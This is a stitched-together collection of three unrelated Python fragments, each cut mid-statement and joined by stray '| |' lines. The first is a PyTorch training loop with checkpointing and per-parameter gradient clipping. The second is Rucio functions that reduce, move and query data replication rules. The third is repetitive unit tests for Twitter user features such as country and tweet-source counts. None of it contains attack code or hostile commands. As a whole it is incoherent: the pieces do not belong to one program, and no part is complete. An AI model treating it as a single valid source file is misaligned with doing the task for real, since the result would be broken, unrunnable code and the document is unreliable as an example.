#for name, var in child_model.named_parameters():
# logger.info(name, var.size(), var.requires_grad) # output all params
num_vars = count_model_params(child_model.parameters())
logger.info("Model has {} params".format(num_vars))
for m in child_model.modules(): # initializer
if isinstance(m, (nn.Conv1d, nn.Linear)):
nn.init.xavier_uniform_(m.weight)
criterion = nn.CrossEntropyLoss()
# get optimizer
if FLAGS.child_optim_algo == "adam":
optimizer = optim.Adam(child_model.parameters(), eps=1e-3, weight_decay=FLAGS.child_l2_reg) # with L2
else:
raise ValueError("Unknown optim_algo {}".format(FLAGS.child_optim_algo))
child_model.to(device)
criterion.to(device)
logger.info("Start training")
start_time = time.time()
step = 0
# save path
model_save_path = os.path.join(FLAGS.output_dir, "model.pth")
best_model_save_path = os.path.join(FLAGS.output_dir, "best_model.pth")
best_acc = 0
start_epoch = 0
if FLAGS.load_checkpoint:
if os.path.isfile(model_save_path):
checkpoint = torch.load(model_save_path, map_location = torch.device('cpu'))
step = checkpoint['step']
start_epoch = checkpoint['epoch']
child_model.load_state_dict(checkpoint['child_model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
for epoch in range(start_epoch, FLAGS.num_epochs):
lr = update_lr(optimizer,
epoch,
l2_reg=FLAGS.child_l2_reg,
lr_warmup_val=None,
lr_init=FLAGS.child_lr,
lr_decay_scheme=FLAGS.child_lr_decay_scheme,
lr_max=FLAGS.child_lr_max,
lr_min=FLAGS.child_lr_min,
lr_T_0=FLAGS.child_lr_T_0,
lr_T_mul=FLAGS.child_lr_T_mul)
child_model.train()
for batch in train_dataloader:
(sent_ids, mask), labels = batch
sent_ids = sent_ids.to(device, non_blocking=True)
mask = mask.to(device, non_blocking=True)
labels = labels.to(device, non_blocking=True)
step += 1
logits = child_model((sent_ids, mask)) # run
loss = criterion(logits, labels.long())
loss = loss.mean()
preds = logits.argmax(dim=1).long()
acc = torch.eq(preds, labels.long()).long().sum().item()
optimizer.zero_grad()
loss.backward()
            grad_norm = 0
            # materialize the parameter list once: parameters() returns a generator, and the norm
            # measurement below would otherwise exhaust it, silently skipping the per-parameter clipping
            trainable_params = list(child_model.parameters())
            assert FLAGS.child_grad_bound is not None, "Need grad_bound to clip gradients."
            # measure the global gradient norm (the huge bound means nothing is clipped by this call)
            grad_norm = nn.utils.clip_grad_norm_(trainable_params, 99999999)
            for param in trainable_params:
                nn.utils.clip_grad_norm_(param, FLAGS.child_grad_bound)  # clip each parameter's gradient
optimizer.step()
if step % FLAGS.log_every == 0:
curr_time = time.time()
log_string = ""
log_string += "epoch={:<6d}".format(epoch)
log_string += "ch_step={:<6d}".format(step)
log_string += " loss={:<8.6f}".format(loss)
log_string += " lr={:<8.4f}".format(lr)
log_string += " |g|={:<8.4f}".format(grad_norm)
log_string += " tr_acc={:<3d}/{:>3d}".format(acc, logits.size()[0])
log_string += " mins={:<10.2f}".format(float(curr_time - start_time) / 60)
logger.info(log_string)
        epoch += 1  # store the next epoch in the checkpoint so a resumed run continues after this one
save_state = {
'step' : step,
'epoch' : epoch,
'child_model_state_dict' : child_model.state_dict(),
'optimizer_state_dict' : optimizer.state_dict()}
torch.save(save_state, model_save_path)
child_model.eval()
logger.info("Epoch {}: Eval".format(epoch))
eval_acc, eval_loss = eval_once(child_model, device, "test", criterion, test_dataloader=test_dataloader)
logger.info("ch_step={} {}_accuracy={:<6.4f} {}_loss={:<6.4f}".format(step, "test", eval_acc, "test", eval_loss))
if eval_acc > best_acc:
best_acc = eval_acc
logger.info("Save best model")
save_state = {
'step' : step,
'epoch' : epoch,
'child_model_state_dict' : child_model.state_dict(),
'optimizer_state_dict' : optimizer.state_dict()}
torch.save(save_state, best_model_save_path)
return eval_acc
def main():
parse_args()
if not os.path.isdir(FLAGS.output_dir):
logger.info("Path {} does not exist. Creating.".format(FLAGS.output_dir))
os.makedirs(FLAGS.output_dir)
elif FLAGS.reset_output_dir:
logger.info("Path {} exists. Remove and remake.".format(FLAGS.output_dir))
shutil.rmtree(FLAGS.output_dir, ignore_errors=True)
os.makedirs(FLAGS.output_dir)
print_user_flags(FLAGS)
if FLAGS.fixed_seed:
set_random_seed(FLAGS.global_seed)
device = torch.device("cuda" if FLAGS.is_cuda else "cpu")
train(device, FLAGS.data_path, | |
%s found' % (rule_id))
except StatementError:
raise RucioException('Badly formatted rule id (%s)' % (rule_id))
@transactional_session
def reduce_rule(rule_id, copies, exclude_expression=None, session=None):
"""
Reduce the number of copies for a rule by atomically replacing the rule.
:param rule_id: Rule to be reduced.
:param copies: Number of copies of the new rule.
:param exclude_expression: RSE Expression of RSEs to exclude.
:param session: The DB Session.
:raises: RuleReplaceFailed, RuleNotFound
"""
try:
rule = session.query(models.ReplicationRule).filter_by(id=rule_id).one()
if copies >= rule.copies:
raise RuleReplaceFailed('Copies of the new rule must be smaller than the old rule.')
if rule.state != RuleState.OK:
raise RuleReplaceFailed('The source rule must be in state OK.')
if exclude_expression:
rse_expression = '(' + rule.rse_expression + ')' + '\\' + '(' + exclude_expression + ')'
else:
rse_expression = rule.rse_expression
grouping = {RuleGrouping.ALL: 'ALL', RuleGrouping.NONE: 'NONE'}.get(rule.grouping, 'DATASET')
if rule.expires_at:
lifetime = (rule.expires_at - datetime.utcnow()).days * 24 * 3600 + (rule.expires_at - datetime.utcnow()).seconds
else:
lifetime = None
notify = {RuleNotification.YES: 'Y', RuleNotification.CLOSE: 'C', RuleNotification.PROGRESS: 'P'}.get(rule.notification, 'N')
new_rule_id = add_rule(dids=[{'scope': rule.scope, 'name': rule.name}],
account=rule.account,
copies=copies,
rse_expression=rse_expression,
grouping=grouping,
weight=rule.weight,
lifetime=lifetime,
locked=rule.locked,
subscription_id=rule.subscription_id,
source_replica_expression=rule.source_replica_expression,
activity=rule.activity,
notify=notify,
purge_replicas=rule.purge_replicas,
ignore_availability=rule.ignore_availability,
session=session)
session.flush()
new_rule = session.query(models.ReplicationRule).filter_by(id=new_rule_id[0]).one()
if new_rule.state != RuleState.OK:
raise RuleReplaceFailed('The replacement of the rule failed.')
delete_rule(rule_id=rule_id,
session=session)
return new_rule_id[0]
except NoResultFound:
raise RuleNotFound('No rule with the id %s found' % (rule_id))
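# A minimal usage sketch for reduce_rule (the rule id and exclusion expression are placeholders,
# and the session is assumed to be supplied by the transactional_session decorator):
#   new_rule_id = reduce_rule(rule_id='1fc8b3b9a0d54a5f9b1c7e2d3f4a5b6c', copies=1,
#                             exclude_expression='tier=1')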
@transactional_session
def move_rule(rule_id: str, rse_expression: str, override: Optional[Dict[str, Any]] = None, session=None):
"""
Move a replication rule to another RSE and, once done, delete the original one.
:param rule_id: Rule to be moved.
:param rse_expression: RSE expression of the new rule.
:param override: Configurations to update for the new rule.
:param session: The DB Session.
:raises: RuleNotFound, RuleReplaceFailed, InvalidRSEExpression
"""
override = override or {}
try:
rule = session.query(models.ReplicationRule).filter_by(id=rule_id).one()
if rule.child_rule_id:
raise RuleReplaceFailed('The rule must not have a child rule.')
grouping = {RuleGrouping.ALL: 'ALL', RuleGrouping.NONE: 'NONE'}.get(rule.grouping, 'DATASET')
if rule.expires_at:
lifetime = (rule.expires_at - datetime.utcnow()).days * 24 * 3600 + (rule.expires_at - datetime.utcnow()).seconds
else:
lifetime = None
notify = {RuleNotification.YES: 'Y', RuleNotification.CLOSE: 'C', RuleNotification.PROGRESS: 'P'}.get(rule.notification, 'N')
options = {
'dids': [{'scope': rule.scope, 'name': rule.name}],
'account': rule.account,
'copies': rule.copies,
'rse_expression': rse_expression,
'grouping': grouping,
'weight': rule.weight,
'lifetime': lifetime,
'locked': rule.locked,
'subscription_id': rule.subscription_id,
'source_replica_expression': rule.source_replica_expression,
'activity': rule.activity,
'notify': notify,
'purge_replicas': rule.purge_replicas,
'ignore_availability': rule.ignore_availability,
'comment': rule.comments,
'session': session,
}
for key in override:
if key in ['dids', 'session']:
raise UnsupportedOperation('Not allowed to override option %s' % key)
elif key not in options:
raise UnsupportedOperation('Non-valid override option %s' % key)
else:
options[key] = override[key]
new_rule_id = add_rule(**options)
session.flush()
update_rule(rule_id=rule_id, options={'child_rule_id': new_rule_id[0], 'lifetime': 0}, session=session)
return new_rule_id[0]
except NoResultFound:
raise RuleNotFound('No rule with the id %s found' % (rule_id))
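# Usage sketch for move_rule (placeholders only). Note that override may only touch keys that
# already exist in the options dict above, and 'dids'/'session' are rejected:
#   move_rule(rule_id='1fc8b3b9a0d54a5f9b1c7e2d3f4a5b6c', rse_expression='tier=2',
#             override={'lifetime': 86400})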
@transactional_session
def re_evaluate_did(scope, name, rule_evaluation_action, session=None):
"""
Re-Evaluates a did.
:param scope: The scope of the did to be re-evaluated.
:param name: The name of the did to be re-evaluated.
:param rule_evaluation_action: The Rule evaluation action.
:param session: The database session in use.
:raises: DataIdentifierNotFound
"""
try:
did = session.query(models.DataIdentifier).filter(models.DataIdentifier.scope == scope,
models.DataIdentifier.name == name).one()
except NoResultFound:
raise DataIdentifierNotFound()
if rule_evaluation_action == DIDReEvaluation.ATTACH:
__evaluate_did_attach(did, session=session)
else:
__evaluate_did_detach(did, session=session)
# Update size and length of did
if session.bind.dialect.name == 'oracle':
stmt = session.query(func.sum(models.DataIdentifierAssociation.bytes),
func.count(1)).\
with_hint(models.DataIdentifierAssociation,
"index(CONTENTS CONTENTS_PK)", 'oracle').\
filter(models.DataIdentifierAssociation.scope == scope,
models.DataIdentifierAssociation.name == name)
for bytes_, length in stmt:
did.bytes = bytes_
did.length = length
# Add an updated_col_rep
if did.did_type == DIDType.DATASET:
models.UpdatedCollectionReplica(scope=scope,
name=name,
did_type=did.did_type).save(session=session)
@read_session
def get_updated_dids(total_workers, worker_number, limit=100, blocked_dids=[], session=None):
"""
Get updated dids.
:param total_workers: Number of total workers.
:param worker_number: id of the executing worker.
:param limit: Maximum number of dids to return.
:param blocked_dids: Blocked dids to filter.
:param session: Database session in use.
"""
query = session.query(models.UpdatedDID.id,
models.UpdatedDID.scope,
models.UpdatedDID.name,
models.UpdatedDID.rule_evaluation_action)
query = filter_thread_work(session=session, query=query, total_threads=total_workers, thread_id=worker_number, hash_variable='name')
    # Remove blocked dids from the query, but only the first 30 of them, to keep the query from growing too large
if blocked_dids:
chunk = list(chunks(blocked_dids, 30))[0]
query = query.filter(tuple_(models.UpdatedDID.scope, models.UpdatedDID.name).notin_(chunk))
if limit:
fetched_dids = query.order_by(models.UpdatedDID.created_at).limit(limit).all()
filtered_dids = [did for did in fetched_dids if (did.scope, did.name) not in blocked_dids]
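        # if an entire fetched page is blocked, retry without a limit so the worker is not starved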
if len(fetched_dids) == limit and not filtered_dids:
return get_updated_dids(total_workers=total_workers,
worker_number=worker_number,
limit=None,
blocked_dids=blocked_dids,
session=session)
else:
return filtered_dids
else:
return [did for did in query.order_by(models.UpdatedDID.created_at).all() if (did.scope, did.name) not in blocked_dids]
@read_session
def get_rules_beyond_eol(date_check, worker_number, total_workers, session):
"""
Get rules which have eol_at before a certain date.
:param date_check: The reference date that should be compared to eol_at.
:param worker_number: id of the executing worker.
:param total_workers: Number of total workers.
:param session: Database session in use.
"""
query = session.query(models.ReplicationRule.scope,
models.ReplicationRule.name,
models.ReplicationRule.rse_expression,
models.ReplicationRule.locked,
models.ReplicationRule.id,
models.ReplicationRule.eol_at,
models.ReplicationRule.expires_at,
models.ReplicationRule.account).\
filter(models.ReplicationRule.eol_at < date_check)
query = filter_thread_work(session=session, query=query, total_threads=total_workers, thread_id=worker_number, hash_variable='name')
return [rule for rule in query.all()]
@read_session
def get_expired_rules(total_workers, worker_number, limit=100, blocked_rules=[], session=None):
"""
Get expired rules.
:param total_workers: Number of total workers.
:param worker_number: id of the executing worker.
:param limit: Maximum number of rules to return.
:param blocked_rules: List of blocked rules.
:param session: Database session in use.
"""
query = session.query(models.ReplicationRule.id, models.ReplicationRule.rse_expression).filter(models.ReplicationRule.expires_at < datetime.utcnow(),
models.ReplicationRule.locked == false(),
models.ReplicationRule.child_rule_id == None).\
with_hint(models.ReplicationRule, "index(rules RULES_EXPIRES_AT_IDX)", 'oracle').\
order_by(models.ReplicationRule.expires_at) # NOQA
query = filter_thread_work(session=session, query=query, total_threads=total_workers, thread_id=worker_number, hash_variable='name')
if limit:
fetched_rules = query.limit(limit).all()
filtered_rules = [rule for rule in fetched_rules if rule[0] not in blocked_rules]
if len(fetched_rules) == limit and not filtered_rules:
return get_expired_rules(total_workers=total_workers,
worker_number=worker_number,
limit=None,
blocked_rules=blocked_rules,
session=session)
else:
return filtered_rules
else:
return [rule for rule in query.all() if rule[0] not in blocked_rules]
@read_session
def get_injected_rules(total_workers, worker_number, limit=100, blocked_rules=[], session=None):
"""
Get rules to be injected.
:param total_workers: Number of total workers.
:param worker_number: id of the executing worker.
:param limit: Maximum number of rules to return.
:param blocked_rules: Blocked rules not to include.
:param session: Database session in use.
"""
if session.bind.dialect.name == 'oracle':
query = session.query(models.ReplicationRule.id).\
with_hint(models.ReplicationRule, "index(rules RULES_INJECTIONSTATE_IDX)", 'oracle').\
filter(text("(CASE when rules.state='I' THEN rules.state ELSE null END)= 'I' ")).\
filter(models.ReplicationRule.state == RuleState.INJECT).\
order_by(models.ReplicationRule.created_at).\
filter(models.ReplicationRule.created_at <= datetime.utcnow())
else:
query = session.query(models.ReplicationRule.id).\
with_hint(models.ReplicationRule, "index(rules RULES_INJECTIONSTATE_IDX)", 'oracle').\
filter(models.ReplicationRule.state == RuleState.INJECT).\
order_by(models.ReplicationRule.created_at).\
filter(models.ReplicationRule.created_at <= datetime.utcnow())
query = filter_thread_work(session=session, query=query, total_threads=total_workers, thread_id=worker_number, hash_variable='name')
if limit:
fetched_rules = query.limit(limit).all()
filtered_rules = [rule for rule in fetched_rules if rule[0] not in blocked_rules]
if len(fetched_rules) == limit and not filtered_rules:
return get_injected_rules(total_workers=total_workers,
worker_number=worker_number,
limit=None,
blocked_rules=blocked_rules,
session=session)
else:
return filtered_rules
else:
return [rule for rule in query.all() if rule[0] not in blocked_rules]
@read_session
def get_stuck_rules(total_workers, worker_number, delta=600, limit=10, blocked_rules=[], session=None):
"""
Get stuck rules.
:param total_workers: Number of total workers.
:param worker_number: id of the executing worker.
:param delta: Delta in seconds to select rules in.
:param limit: Maximum number of rules to select.
:param blocked_rules: Blocked rules to filter out.
:param session: Database session in use.
"""
if session.bind.dialect.name == 'oracle':
query = session.query(models.ReplicationRule.id).\
with_hint(models.ReplicationRule, "index(rules RULES_STUCKSTATE_IDX)", 'oracle').\
filter(text("(CASE when rules.state='S' THEN rules.state ELSE null END)= 'S' ")).\
filter(models.ReplicationRule.state == RuleState.STUCK).\
filter(models.ReplicationRule.updated_at < datetime.utcnow() - timedelta(seconds=delta)).\
filter(or_(models.ReplicationRule.expires_at == null(),
models.ReplicationRule.expires_at > datetime.utcnow(),
models.ReplicationRule.locked == true())).\
order_by(models.ReplicationRule.updated_at) # NOQA
else:
query = session.query(models.ReplicationRule.id).\
with_hint(models.ReplicationRule, "index(rules RULES_STUCKSTATE_IDX)", 'oracle').\
filter(models.ReplicationRule.state == RuleState.STUCK).\
filter(models.ReplicationRule.updated_at < datetime.utcnow() - timedelta(seconds=delta)).\
filter(or_(models.ReplicationRule.expires_at == null(),
models.ReplicationRule.expires_at > datetime.utcnow(),
models.ReplicationRule.locked == true())).\
order_by(models.ReplicationRule.updated_at)
query = filter_thread_work(session=session, query=query, total_threads=total_workers, thread_id=worker_number, hash_variable='name')
if limit:
fetched_rules = query.limit(limit).all()
filtered_rules = [rule for rule in fetched_rules if rule[0] not in blocked_rules]
if len(fetched_rules) == limit and not filtered_rules:
return get_stuck_rules(total_workers=total_workers,
worker_number=worker_number,
delta=delta,
limit=None,
blocked_rules=blocked_rules,
session=session)
else:
return filtered_rules
else:
return [rule for rule in query.all() if rule[0] not in blocked_rules]
@transactional_session
def delete_updated_did(id_, session=None):
"""
Delete an updated_did by id.
    :param id_: Id of the row to delete.
:param session: The database session in use.
"""
session.query(models.UpdatedDID).filter(models.UpdatedDID.id == id_).delete()
@transactional_session
def update_rules_for_lost_replica(scope, name, rse_id, nowait=False, session=None, logger=logging.log):
"""
Update rules if a file replica is lost.
:param scope: Scope of the replica.
:param name: Name of the replica.
:param rse_id: RSE id of the replica.
:param nowait: Nowait parameter for the FOR UPDATE statement.
:param session: The database session in use.
:param logger: Optional decorated logger that can be passed from the calling daemons or servers.
"""
locks = session.query(models.ReplicaLock).filter(models.ReplicaLock.scope == scope, models.ReplicaLock.name == name, models.ReplicaLock.rse_id == rse_id).with_for_update(nowait=nowait).all()
replica = session.query(models.RSEFileAssociation).filter(models.RSEFileAssociation.scope == scope, models.RSEFileAssociation.name == name, models.RSEFileAssociation.rse_id == rse_id).with_for_update(nowait=nowait).one()
requests = session.query(models.Request).filter(models.Request.scope == scope, | |
= User.parse(api=None, json=user_dic)
user_features = UserFeatures(user, [])
self.assertTrue(np.isnan(user_features[USER_FEATURES_INDEX["number_of_different_countries"]]))
def test_number_of_different_countries(self):
user_dic = {
"id": 1,
"name": "<NAME>",
"screen_name": "test_account",
"location": "",
"url": None,
"expanded_url": None,
"description": "",
"protected": False,
"verified": False,
"followers_count": 10,
"friends_count": 15,
"listed_count": 2,
"favourites_count": 50,
"statuses_count": 9,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(TWITTER_DATE_TIME_FORMAT),
"profile_image_url_https": "",
"default_profile": True,
"default_profile_image": True,
"withheld_in_countries": "",
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}
user = User.parse(api=None, json=user_dic)
tweets = [
Status.parse(api=None, json={
"id": 0,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": {
"country_code": "DE",
"name": "Berlin"
},
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}),
Status.parse(api=None, json={
"id": 1,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": {
"country_code": "DE",
"name": "Berlin"
},
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}),
Status.parse(api=None, json={
"id": 2,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": {
"country_code": "EN",
"name": "London"
},
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
})
]
user_features = UserFeatures(user, tweets)
self.assertEqual(user_features[USER_FEATURES_INDEX["number_of_different_countries"]], 2.0)
def test_country_with_most_tweets_nan(self):
user_dic = {
"id": 1,
"name": "Test Account",
"screen_name": "test_account",
"location": "",
"url": None,
"expanded_url": None,
"description": "",
"protected": False,
"verified": False,
"followers_count": 10,
"friends_count": 15,
"listed_count": 2,
"favourites_count": 50,
"statuses_count": 9,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(TWITTER_DATE_TIME_FORMAT),
"profile_image_url_https": "",
"default_profile": True,
"default_profile_image": True,
"withheld_in_countries": "",
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}
user = User.parse(api=None, json=user_dic)
user_features = UserFeatures(user, [])
self.assertTrue(np.isnan(user_features[USER_FEATURES_INDEX["country_with_most_tweets"]]))
def test_country_with_most_tweets(self):
user_dic = {
"id": 1,
"name": "<NAME>",
"screen_name": "test_account",
"location": "",
"url": None,
"expanded_url": None,
"description": "",
"protected": False,
"verified": False,
"followers_count": 10,
"friends_count": 15,
"listed_count": 2,
"favourites_count": 50,
"statuses_count": 9,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(TWITTER_DATE_TIME_FORMAT),
"profile_image_url_https": "",
"default_profile": True,
"default_profile_image": True,
"withheld_in_countries": "",
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}
user = User.parse(api=None, json=user_dic)
tweets = [
Status.parse(api=None, json={
"id": 0,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": {
"country_code": "DE",
"name": "Berlin"
},
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}),
Status.parse(api=None, json={
"id": 1,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": {
"country_code": "DE",
"name": "Berlin"
},
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}),
Status.parse(api=None, json={
"id": 2,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": {
"country_code": "EN",
"name": "London"
},
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
})
]
user_features = UserFeatures(user, tweets)
self.assertEqual(user_features[USER_FEATURES_INDEX["country_with_most_tweets"]], COUNTRY_CODES_IDX["DE"])
def test_number_of_different_sources_nan(self):
user_dic = {
"id": 1,
"name": "Test Account",
"screen_name": "test_account",
"location": "",
"url": None,
"expanded_url": None,
"description": "",
"protected": False,
"verified": False,
"followers_count": 10,
"friends_count": 15,
"listed_count": 2,
"favourites_count": 50,
"statuses_count": 9,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(TWITTER_DATE_TIME_FORMAT),
"profile_image_url_https": "",
"default_profile": True,
"default_profile_image": True,
"withheld_in_countries": "",
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}
user = User.parse(api=None, json=user_dic)
user_features = UserFeatures(user, [])
self.assertTrue(np.isnan(user_features[USER_FEATURES_INDEX["number_of_different_sources"]]))
def test_number_of_different_sources(self):
user_dic = {
"id": 1,
"name": "Test Account",
"screen_name": "test_account",
"location": "",
"url": None,
"expanded_url": None,
"description": "",
"protected": False,
"verified": False,
"followers_count": 10,
"friends_count": 15,
"listed_count": 2,
"favourites_count": 50,
"statuses_count": 9,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(TWITTER_DATE_TIME_FORMAT),
"profile_image_url_https": "",
"default_profile": True,
"default_profile_image": True,
"withheld_in_countries": "",
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}
user = User.parse(api=None, json=user_dic)
tweets = [
Status.parse(api=None, json={
"id": 0,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": None,
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}),
Status.parse(api=None, json={
"id": 1,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": None,
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}),
Status.parse(api=None, json={
"id": 2,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": None,
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Android App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
})
]
user_features = UserFeatures(user, tweets)
self.assertEqual(user_features[USER_FEATURES_INDEX["number_of_different_sources"]], 2.0)
def test_most_used_source_nan(self):
user_dic = {
"id": 1,
"name": "<NAME>",
"screen_name": "test_account",
"location": "",
"url": None,
"expanded_url": None,
"description": "",
"protected": False,
"verified": False,
"followers_count": 10,
"friends_count": 15,
"listed_count": 2,
"favourites_count": 50,
"statuses_count": 9,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(TWITTER_DATE_TIME_FORMAT),
"profile_image_url_https": "",
"default_profile": True,
"default_profile_image": True,
"withheld_in_countries": "",
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}
user = User.parse(api=None, json=user_dic)
user_features = UserFeatures(user, [])
self.assertTrue(np.isnan(user_features[USER_FEATURES_INDEX["most_used_source"]]))
def test_most_used_source(self):
user_dic = {
"id": 1,
"name": "Test Account",
"screen_name": "test_account",
"location": "",
"url": None,
"expanded_url": None,
"description": "",
"protected": False,
"verified": False,
"followers_count": 10,
"friends_count": 15,
"listed_count": 2,
"favourites_count": 50,
"statuses_count": 9,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(TWITTER_DATE_TIME_FORMAT),
"profile_image_url_https": "",
"default_profile": True,
"default_profile_image": True,
"withheld_in_countries": "",
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}
user = User.parse(api=None, json=user_dic)
tweets = [
Status.parse(api=None, json={
"id": 0,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": None,
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}),
Status.parse(api=None, json={
"id": 1,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": None,
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Web App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}),
Status.parse(api=None, json={
"id": 2,
"user_id": 1,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(
TWITTER_DATE_TIME_FORMAT),
"text": "This is just a simple test tweet text.",
"coordinates": None,
"place": None,
"in_reply_to_status_id": None,
"in_reply_to_user_id": None,
